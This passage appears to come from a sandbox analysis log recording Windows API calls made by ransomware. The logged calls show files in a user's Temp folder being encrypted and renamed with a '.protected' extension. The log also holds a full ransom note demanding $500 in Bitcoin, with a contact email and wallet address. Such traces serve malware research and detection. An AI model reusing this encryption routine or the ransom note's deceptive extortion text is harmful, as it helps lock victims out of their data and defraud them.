lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.771] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.771] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.771] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.771] CloseHandle (hObject=0xd8) returned 1 [0086.771] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv.protected") returned 85 [0086.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cb2ryevfawk7v0b3rq.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CB2RyEvFAWK7v0b3Rq.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cb2ryevfawk7v0b3rq.mkv.protected")) returned 1 [0086.773] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.773] lstrcmpiW (lpString1="Cookies", lpString2="Windows") returned -1 [0086.773] lstrcmpiW (lpString1="Cookies", lpString2="Program Files") returned -1 [0086.773] lstrcmpiW (lpString1="Cookies", lpString2="Program Files (x86)") returned -1 [0086.773] lstrcmpiW (lpString1="Cookies", lpString2="$Recycle.bin") returned 1 [0086.773] lstrcmpiW (lpString1="Cookies", lpString2="System Volume Information") returned -1 [0086.773] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies") returned 60 [0086.773] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0086.773] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0086.773] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\*") returned 62 [0086.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.774] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.774] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.774] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.774] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.774] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.774] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\.") returned 62 [0086.774] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.774] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.774] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.774] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.774] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.775] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.775] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.775] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.775] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.775] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.775] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.775] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\..") returned 63 [0086.775] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.775] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.775] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.775] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.775] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.775] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.775] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.775] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0086.775] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0086.775] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0086.775] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0086.775] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0086.775] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat") returned 70 [0086.775] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0086.775] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0086.775] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.775] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat") returned 70 [0086.776] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0086.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat") returned 70 [0086.776] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0086.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat") returned 70 [0086.776] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0086.776] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0086.780] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.781] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0086.781] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.781] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0086.781] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0086.781] CloseHandle (hObject=0x14c) returned 1 [0086.781] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat.protected") returned 80 [0086.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat.protected")) returned 1 [0086.782] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.782] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.783] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\RESTORE_FILES.txt") returned 78 [0086.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.783] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.783] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.784] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.784] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.784] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.784] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.785] CloseHandle (hObject=0xd8) returned 1 [0086.785] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.785] lstrcmpiW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="Windows") returned -1 [0086.785] lstrcmpiW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="Program Files") returned -1 [0086.785] lstrcmpiW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="Program Files (x86)") returned -1 [0086.785] lstrcmpiW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="$Recycle.bin") returned 1 [0086.785] lstrcmpiW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="System Volume Information") returned -1 [0086.785] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp") returned 73 [0086.785] StrStrIW (lpFirst="dYj_QL4r6Cr5gjeC.odp", lpSrch=".protected") returned 0x0 [0086.785] lstrcmpW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="RESTORE_FILES.txt") returned -1 [0086.785] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.785] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\dyj_ql4r6cr5gjec.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp") returned 73 [0086.785] StrStrW (lpFirst="dYj_QL4r6Cr5gjeC.odp", lpSrch=".txt") returned 0x0 [0086.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp") returned 73 [0086.785] StrStrW (lpFirst="dYj_QL4r6Cr5gjeC.odp", lpSrch=".rar") returned 0x0 [0086.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp") returned 73 [0086.786] StrStrW (lpFirst="dYj_QL4r6Cr5gjeC.odp", lpSrch=".zip") returned 0x0 [0086.786] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.786] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.786] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.787] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.787] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.787] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.787] CloseHandle (hObject=0xd8) returned 1 [0086.788] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp.protected") returned 83 [0086.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\dyj_ql4r6cr5gjec.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\dyj_ql4r6cr5gjec.odp.protected")) returned 1 [0086.789] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.789] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Windows") returned -1 [0086.789] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Program Files") returned -1 [0086.789] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Program Files (x86)") returned -1 [0086.789] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="$Recycle.bin") returned 1 [0086.789] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="System Volume Information") returned -1 [0086.789] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 75 [0086.789] StrStrIW (lpFirst="FXSAPIDebugLogFile.txt", lpSrch=".protected") returned 0x0 [0086.789] lstrcmpW (lpString1="FXSAPIDebugLogFile.txt", lpString2="RESTORE_FILES.txt") returned -1 [0086.789] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.789] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.790] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.790] lstrcmpiW (lpString1="Gjm5o.doc", lpString2="Windows") returned -1 [0086.790] lstrcmpiW (lpString1="Gjm5o.doc", lpString2="Program Files") returned -1 [0086.790] lstrcmpiW (lpString1="Gjm5o.doc", lpString2="Program Files (x86)") returned -1 [0086.790] lstrcmpiW (lpString1="Gjm5o.doc", lpString2="$Recycle.bin") returned 1 [0086.790] lstrcmpiW (lpString1="Gjm5o.doc", lpString2="System Volume Information") returned -1 [0086.790] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc") returned 62 [0086.790] StrStrIW (lpFirst="Gjm5o.doc", lpSrch=".protected") returned 0x0 [0086.790] lstrcmpW (lpString1="Gjm5o.doc", lpString2="RESTORE_FILES.txt") returned -1 [0086.790] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.790] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gjm5o.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc") returned 62 [0086.791] StrStrW (lpFirst="Gjm5o.doc", lpSrch=".txt") returned 0x0 [0086.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc") returned 62 [0086.791] StrStrW (lpFirst="Gjm5o.doc", lpSrch=".rar") returned 0x0 [0086.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc") returned 62 [0086.791] StrStrW (lpFirst="Gjm5o.doc", lpSrch=".zip") returned 0x0 [0086.791] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.792] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.792] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.792] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.792] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.792] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.793] CloseHandle (hObject=0xd8) returned 1 [0086.793] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc.protected") returned 72 [0086.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gjm5o.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gjm5o.doc.protected")) returned 1 [0086.794] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.794] lstrcmpiW (lpString1="GoxtxhkLQv.m4a", lpString2="Windows") returned -1 [0086.794] lstrcmpiW (lpString1="GoxtxhkLQv.m4a", lpString2="Program Files") returned -1 [0086.794] lstrcmpiW (lpString1="GoxtxhkLQv.m4a", lpString2="Program Files (x86)") returned -1 [0086.794] lstrcmpiW (lpString1="GoxtxhkLQv.m4a", lpString2="$Recycle.bin") returned 1 [0086.794] lstrcmpiW (lpString1="GoxtxhkLQv.m4a", lpString2="System Volume Information") returned -1 [0086.794] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 